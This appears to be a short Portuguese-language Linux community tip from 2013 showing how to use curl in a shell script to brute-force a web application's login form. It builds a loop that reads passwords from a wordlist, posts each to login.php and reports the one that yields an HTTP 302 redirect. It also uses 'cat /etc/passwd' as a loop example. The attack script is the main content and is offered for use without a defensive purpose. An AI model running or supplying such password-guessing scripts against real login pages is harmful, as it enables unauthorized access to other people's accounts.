cURL - Brute-force em aplicações Web

Publicado por Perfil removido em 01/05/2013

[ Hits: 14.319 ]

 


cURL - Brute-force em aplicações Web



Estava pesquisando sobre o cURL, e tive a ideia de fazer um brute-force em shell script, mas como eu já fiz isso, resolvi somente testar os comandos.

Primeiro, iremos ver algumas opções de linha de comando do cURL:

curl -h
Usage: curl [options...] <url>
 -F/--form <name=content> Specify HTTP multipart POST data (H)
 -o/--output <file> Write output to <file> instead of stdout
 -s/--silent        Silent mode. Don't output anything
 -w/--write-out <format> What to output after completion

Ressaltei essas funções, pois serão necessárias para o ataque de brute-force.

Entendo as opções:

1. As opções "-s" e "-o" são para não exibirem o conteúdo HTML do request; iremos mandar essa saída de comando para o /dev/null.

2. O comando "-F" funciona para enviar os parâmetros através de "POST request".

Exemplo:

curl -F teste=enviando-post localhost/teste.php
3. E por último, a opção "-w", usaremos essa opção para descobrir o status code do request, levando em consideração que a maioria dos sistemas de login, quando se faz o login corretamente, redirecionam para outra página (302).

Exemplo:

curl -w "%{http_code}" localhost/lol
No final da saída do comando, obtemos o número 404 (Not Found).

Fazendo o ataque

Agora iremos proceder para o ataque de brute-force. Primeiro, temos que saber quais os nomes dos campos que iremos enviar pelo POST request.

Exemplo: login, password, log, passwd, user, etc.

Tendo essas informações, iremos transformar a saída do comando em uma variável.

Exemplo:

curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php
A saída do comando foi 302 (redirecionamento), iremos guardar esse saída na variável "login":

login=$(curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php)

Agora, para proceder com o ataque de "word list" iremos usar o "for" para ler um arquivo linha por linha.

Exemplo:

for i in `cat /etc/passwd`;do echo $i; done

Nosso comando final ficará assim:
for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done

Pronto, você já estará fazendo um ataque de brute-force através de uma "word list", usando o terminal.

Espero que tenham gostado da dica.
[]'s

Dica também publicada em:
Outras dicas deste autor

Instalando o driver da Nvidia no Mandriva 2008.1

kinit: No resume image, doing normal boot...

Canal de vídeo-aulas no Youtube

OpenOffice.org em português do Brasil no Linux

Ativando speaker no Fedora Core 4

Leitura recomendada

Sistema de backup em shell script

Comandos mkdir e cd simultaneamente

Gravando logs dos comandos digitados

Como mudar o teclado do Debian em uma máquina virtual configurada em outro SO

Sincronizando data e hora com relogio atômico

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário